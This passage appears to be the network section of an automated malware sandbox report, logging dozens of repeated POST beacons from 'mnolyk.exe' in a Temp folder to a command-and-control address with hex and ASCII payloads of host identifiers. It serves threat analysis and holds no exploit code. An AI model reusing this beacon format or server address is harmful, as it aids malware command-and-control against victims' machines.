                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:00.854032993 CET468INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        268192.168.2.54995862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:01.022167921 CET469OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:01.087373018 CET469INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        269192.168.2.54995962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:01.254903078 CET470OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:01.318948984 CET470INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        27192.168.2.54971762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:38.110724926 CET227OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:38.180257082 CET228INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        270192.168.2.54996062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:01.488614082 CET471OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:01.551234961 CET471INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        271192.168.2.54996162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:01.749516010 CET472OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:01.814297915 CET472INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        272192.168.2.54996262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:02.000570059 CET473OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:02.069396973 CET473INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        273192.168.2.54996362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:02.243571997 CET474OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:02.309935093 CET474INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        274192.168.2.54996462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:02.489491940 CET475OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:02.553540945 CET475INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        275192.168.2.54996562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:02.723607063 CET476OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:02.786803007 CET476INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        276192.168.2.54996662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:02.959271908 CET477OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:03.022351027 CET477INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        277192.168.2.54996762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:03.193008900 CET478OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:03.259531975 CET478INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        278192.168.2.54996862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:03.426820993 CET479OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:03.490326881 CET479INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        279192.168.2.54996962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:03.665185928 CET480OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:03.728063107 CET480INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        28192.168.2.54971862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:38.360119104 CET228OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:38.424526930 CET229INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        280192.168.2.54997062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:03.894707918 CET481OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:03.957648993 CET481INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        281192.168.2.54997162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:04.128226995 CET482OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:04.192429066 CET482INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        282192.168.2.54997262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:04.364384890 CET483OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:04.428808928 CET483INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        283192.168.2.54997362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:04.598156929 CET484OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:04.660758972 CET484INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        284192.168.2.54997462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:04.837733984 CET485OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:04.902610064 CET485INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        285192.168.2.54997562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:05.084398031 CET486OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
